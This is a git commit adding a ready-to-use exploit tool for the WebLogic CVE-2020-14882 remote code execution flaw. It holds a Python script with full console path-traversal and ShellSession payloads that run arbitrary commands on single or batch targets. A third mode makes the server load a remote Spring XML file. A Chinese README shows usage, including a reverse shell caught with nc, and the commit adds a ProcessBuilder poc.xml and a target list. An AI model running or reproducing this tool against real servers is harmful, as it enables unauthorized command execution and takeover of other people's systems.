add weblogic CVE-2020-14882 RCE 漏洞

2022-03-01 10:27:04 +08:00 · 2022-03-01 10:27:04 +08:00 · 1c30332680
commit 1c30332680
parent 2cffafd25a
4 changed files with 176 additions and 0 deletions
--- a/漏洞/CVE-2020-14882_ALL.py
+++ b/漏洞/CVE-2020-14882_ALL.py
@ -0,0 +1,109 @@
+#coding:utf-8
+import requests
+import sys
+import argparse
+import http.client
+
+http.client.HTTPConnection._http_vsn = 10
+http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
+
+requests.packages.urllib3.disable_warnings()
+
+
+#功能1方法：回显命令执行。
+def command(url_cmd,headers_cmd,url):
+	try:
+		res = requests.get(url_cmd, headers = headers_cmd,timeout = 15, verify = False)
+		if "<html" not in res.text and "<TITLE" not in res.text :
+			print ("[+] Command success result:")
+			print (res.text)
+
+		else:
+			print ("[-] " + url + " not vulnerable or command error!")
+	except Exception as e:
+		#print (e)
+		print ("[-] " + url + " not vulnerable or command error!")
+
+
+#功能2方法：无回显，命令执行,适用于Weblogic 10.x、12.x。
+def weblogic_12(url_cmd,post_12,headers_12):
+	try:
+		res = requests.post(url_cmd, data = post_12, headers = headers_12,timeout = 15, verify = False)
+		#print ("[+] Attack complete!")
+	except Exception as e:
+		print ("[+] Attack complete!")
+
+def main():
+	banner = """  _______      ________    ___   ___ ___   ___        __ _  _   ___   ___ ___  
+ / ____\ \    / /  ____|  |__ \ / _ \__ \ / _ \      /_ | || | / _ \ / _ \__ \ 
+| |     \ \  / /| |__ ______ ) | | | | ) | | | |______| | || || (_) | (_) | ) |
+| |      \ \/ / |  __|______/ /| | | |/ /| | | |______| |__   _> _ < > _ < / / 
+| |____   \  /  | |____    / /_| |_| / /_| |_| |      | |  | || (_) | (_) / /_ 
+ \_____|   \/   |______|  |____|\___/____|\___/       |_|  |_| \___/ \___/____|
+                                                                               
+                                                         Author:GGyao
+                                                         Github:https://github.com/GGyao
+
+"""
+
+	print (banner)
+	parser = argparse.ArgumentParser()
+	parser.add_argument("-u", "--url", help="Target URL; Example:http://ip:port。")
+	parser.add_argument("-f", "--file", help="Target File; Example:target.txt。")
+	parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
+	parser.add_argument("-x", "--xml", help="Remote XML file; Example:http://vpsip/poc.xml; ")
+	args = parser.parse_args()
+
+	#功能1：命令回显。
+	if args.url != None and args.cmd != None:
+		url = args.url
+		url_cmd = args.url + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
+		headers_cmd = {
+		'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
+		'cmd':args.cmd,
+		'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+		'Content-Type':'application/x-www-form-urlencoded'
+		}
+
+		#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""
+
+	
+		#command(url_cmd,post_cmd,headers_cmd,url)
+		command(url_cmd,headers_cmd,url)
+
+	#功能2：weblogic 12.x命令执行。
+	if args.url != None and args.xml != None:
+		url_cmd = args.url + '/console/images/%252e%252e/console.portal'
+		headers_12 = {
+		'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
+		'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+		'Content-Type':'application/x-www-form-urlencoded'
+		}
+
+		post_12 = """_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22{}%22)""".format(args.xml)
+
+		weblogic_12(url_cmd,post_12,headers_12)
+
+	# 功能3：回显命令执行批量。
+	if args.file != None and args.cmd != None:
+		#print (1)
+		for File  in open(args.file):
+			File = File.strip()
+			url_cmd = File + """/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("%5C%5CA").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""
+			print ("[*] >>> Test:" + File)
+
+			url = File
+			headers_cmd = {
+			'User-Agent':'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0',
+			'cmd':args.cmd,
+			'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
+			'Content-Type':'application/x-www-form-urlencoded'
+			}
+
+
+			#post_cmd = """_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.WorkAdapter+adapter+%3d+((weblogic.work.ExecuteThread)Thread.currentThread()).getCurrentWork()%3b+java.lang.reflect.Field+field+%3d+adapter.getClass().getDeclaredField("connectionHandler")%3bfield.setAccessible(true)%3bObject+obj+%3d+field.get(adapter)%3bweblogic.servlet.internal.ServletRequestImpl+req+%3d+(weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj)%3b+String+cmd+%3d+req.getHeader("cmd")%3bString[]+cmds+%3d+System.getProperty("os.name").toLowerCase().contains("window")+%3f+new+String[]{"cmd.exe",+"/c",+cmd}+%3a+new+String[]{"/bin/sh",+"-c",+cmd}%3bif(cmd+!%3d+null+){+String+result+%3d+new+java.util.Scanner(new+java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\\A").next()%3b+weblogic.servlet.internal.ServletResponseImpl+res+%3d+(weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req)%3b+res.getServletOutputStream().writeStream(new+weblogic.xml.util.StringInputStream(result))%3bres.getServletOutputStream().flush()%3bres.getWriter().write("")%3b}')"""
+			command(url_cmd,headers_cmd,url)
+
+
+if __name__=="__main__":
+	main()
--- a/WebLogic/CVE-2020-14882
+++ b/WebLogic/CVE-2020-14882
@ -0,0 +1,56 @@
+# CVE-2020-14882 RCE 漏洞
+>CVE-2020-14882_ALL综合利用工具，支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
+>
+>需要模块：requests、http.client
+
+
+### 选项
+
+![](./images/1.png)
+
+### 功能一：命令回显
+python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "net user"
+
+![](./images/2.png)
+
+python3 CVE-2020-14882_ALL.py -u http://1.1.1.1:7001 -c "whoami"
+
+![](./images/3.png)
+
+### 功能二：批量命令回显
+```shell script
+python3 CVE-2020-14882_ALL.py -f target.txt -c "whoami"
+```
+> target.txt 格式：http://x.x.x.x:xx，一行一个。
+
+![](./images/4.png)
+
+### 功能三：外置xml文件无回显命令执行
+1. Linux反弹shell为例，编辑好poc.xml文件，开启python监听。  
+
+```xml
+<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
+    <constructor-arg>
+      <list>
+	<value>cmd</value>
+      </list>
+    </constructor-arg>
+  </bean>
+</beans>
+```
+
+开启python监听。  
+![](./images/5.png)
+
+nc开启监听。  
+![](./images/6.png)
+
+2. 使用-x选项指定xml文件路径，发送payload。  
+```shell script
+python3 CVE-2020-14882_ALL.py -u http://xxxx:7001 -x http://xxx:8000/poc.xml
+```
+![](./images/7.png)  
+3. 成功接收shell。  
+![](./images/8.png)
+
--- a/WebLogic/CVE-2020-14882
+++ b/WebLogic/CVE-2020-14882
@ -0,0 +1,9 @@
+<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
+  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
+    <constructor-arg>
+      <list>
+	<value>cmd</value>
+      </list>
+    </constructor-arg>
+  </bean>
+</beans>
--- a/WebLogic/CVE-2020-14882
+++ b/WebLogic/CVE-2020-14882
@ -0,0 +1,2 @@
+http://1.1.1.1:xx
+http://1.1.1.1:xx